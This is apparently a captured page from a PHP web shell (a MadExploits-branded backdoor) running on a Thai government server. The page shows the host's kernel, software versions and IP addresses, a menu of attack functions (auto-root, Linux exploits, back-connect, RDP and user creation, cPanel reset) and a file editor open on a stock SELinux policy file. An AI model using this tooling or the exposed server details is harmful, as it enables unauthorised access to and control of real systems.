Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
selinux /
devel /
include /
kernel /
[ HOME SHELL ]
Name
Size
Permission
Action
corecommands.if
23.39
KB
-rw-r--r--
corenetwork.if
2
MB
-rw-r--r--
devices.if
94.26
KB
-rw-r--r--
domain.if
31.2
KB
-rw-r--r--
files.if
137.65
KB
-rw-r--r--
filesystem.if
96.26
KB
-rw-r--r--
kernel.if
64.54
KB
-rw-r--r--
mcs.if
3.01
KB
-rw-r--r--
mls.if
19.02
KB
-rw-r--r--
selinux.if
14.58
KB
-rw-r--r--
storage.if
18.27
KB
-rw-r--r--
terminal.if
30.35
KB
-rw-r--r--
ubac.if
3.67
KB
-rw-r--r--
unlabelednet.if
88
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mcs.if
## <summary>Multicategory security policy</summary> ## <required val="true"> ## Contains attributes used in MCS policy. ## </required> ######################################## ## <summary> ## This domain is allowed to read files and directories ## regardless of their MCS category set. ## </summary> ## <param name="domain"> ## <summary> ## Domain target for user exemption. ## </summary> ## </param> ## <rolecap/> # interface(`mcs_file_read_all',` gen_require(` attribute mcsreadall; ') typeattribute $1 mcsreadall; ') ######################################## ## <summary> ## This domain is allowed to write files and directories ## regardless of their MCS category set. ## </summary> ## <param name="domain"> ## <summary> ## Domain target for user exemption. ## </summary> ## </param> ## <rolecap/> # interface(`mcs_file_write_all',` gen_require(` attribute mcswriteall; ') typeattribute $1 mcswriteall; ') ######################################## ## <summary> ## This domain is allowed to sigkill and sigstop ## all domains regardless of their MCS category set. ## </summary> ## <param name="domain"> ## <summary> ## Domain target for user exemption. ## </summary> ## </param> ## <rolecap/> # interface(`mcs_killall',` gen_require(` attribute mcskillall; ') typeattribute $1 mcskillall; ') ######################################## ## <summary> ## This domain is allowed to ptrace ## all domains regardless of their MCS ## category set. ## </summary> ## <param name="domain"> ## <summary> ## Domain target for user exemption. ## </summary> ## </param> # interface(`mcs_ptrace_all',` gen_require(` attribute mcsptraceall; ') typeattribute $1 mcsptraceall; ') ######################################## ## <summary> ## Make specified domain MCS trusted ## for setting any category set for ## the processes it executes. ## </summary> ## <param name="domain"> ## <summary> ## Domain target for user exemption. ## </summary> ## </param> # interface(`mcs_process_set_categories',` gen_require(` attribute mcssetcats; ') typeattribute $1 mcssetcats; ') ####################################### ## <summary> ## Make specified process type MCS untrusted. ## </summary> ## <desc> ## <p> ## Make specified process type MCS untrusted. This ## prevents this process from sending signals to other processes ## with different mcs labels ## object. ## </p> ## </desc> ## <param name="domain"> ## <summary> ## The type of the process. ## </summary> ## </param> # interface(`mcs_untrusted_proc',` gen_require(` attribute mcsuntrustedproc; ') typeattribute $1 mcsuntrustedproc; ') ###################################### ## <summary> ## Make specified domain MCS trusted ## for writing to sockets at any level. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <rolecap/> # interface(`mcs_socket_write_all_levels',` gen_require(` attribute mcsnetwrite; ') typeattribute $1 mcsnetwrite; ')
Close